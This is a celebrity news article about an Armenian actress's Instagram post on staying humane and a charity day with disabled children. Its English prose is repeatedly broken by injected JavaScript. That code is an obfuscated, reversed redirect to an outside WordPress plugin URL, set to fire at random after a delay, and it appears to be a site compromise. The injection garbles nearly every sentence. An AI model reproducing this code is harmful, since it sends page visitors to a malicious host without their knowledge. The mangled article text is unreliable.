Nazeni Hovhannisyan’s New Exciting Post

Nazeni Hovhannisyan is very active on her Instagram page. She often shares with her followers her deepest thoughts.

This time the actress has posted a very beautiful photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to and shared her idea of ​​humanity by writing, “The most difficult thing in life is toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to stay human in the place where everything is against you, stay person when they want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to break and spoil you; stay person when your soul is fully open, but they pass by trampling without considering your pain, or even worse, when do that in purpose.Is it so hard toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to understand that the most difficult thing is toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to stay human? The only toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool that influences the evil is the good. Today was a Day of Kindness in “Armenian Mothers”, when you feel like a human when you are blessed and become the one who spreads the kindness. It was a day of kindness thanks toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the children who had some disabilities. They probably did not even suspect how much they change our way of life, how much they give power toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fight. Such kind of contacts and evenings help people toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to stay human. ”

View this post on Instagram

Ամենաբարդը Մարդ մնալն է, մարդ մնալն այնտեղ, որտեղ ամեն ինչ հակառակն է ասես, մնալ մարդ այն դեպքում, երբ քեզ ուզում են կոտրել, փչացնել կամ աղտոտել, դժվարը մարդ մնալն է, երբ հոգիդ բաց է ամբողջությամբ, բայց տրորելով անցնում են՝ չկասկածելով անգամ, թե ինչ ցավ են պատճառում, չհասկանալով, կամ ավելի վատ, երբ հասկանալով են ցավեցնում, տրորում ու վնասում։ Մի՞թե այդքան դժվար է հասկանալ…որ ամենաբարդը՝ մարդ մնալն է։ Չարի դեմ միակ ազդող գործիքը՝ բարին է։ Այսօր Բարության օր էր «Հայ Մայրեր»-ում, երբ Մարդ ես զգում քեզ, երբ Բարության մեջ օրհնվում ես ու ինքդ էլ դառնում նրա տարածողը։ Բարության օր էր ու հենց խնդիր ունեցող փոքրիկների շնորհիվ, որոնք երևի չեն էլ կասկածում, թե իրենց Գոյությամբ որքան բան են փոխում, որքան մարդու նոր կյանք և պայքարելու ուժ տալիս… պայքարող մարդիկ բարի են լինում,,, մաքուր ու հոսող ջրի պես քաղցր ու իրենց բարությամբ՝ անգամ քարը հղկող։ Ջրի պես բարի)) Բարեգործական այսօրինակ շփումներն ու երեկոներն ՕԳՆՈՒՄ ԵՆ, որ մարդ ՄԱՐԴ ՄՆԱ, այսքանը։ Լուսնակարը՝ ՀՀ սահմանին ծառայող հայ զինվոր @koloyanrobert -ի դիմահարդարումը՝անկրկնելի @hranushyeghoyan- ի #nazenihovhannisyan #media #travellover #dontbesad #sweet #blogger #n #said

A post shared by Nazeni Hovhannisyan (@nazenihovhannisyan) on

The photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tographer is Robert Koloyan, while Hranush Yeghoyan has done the makeup.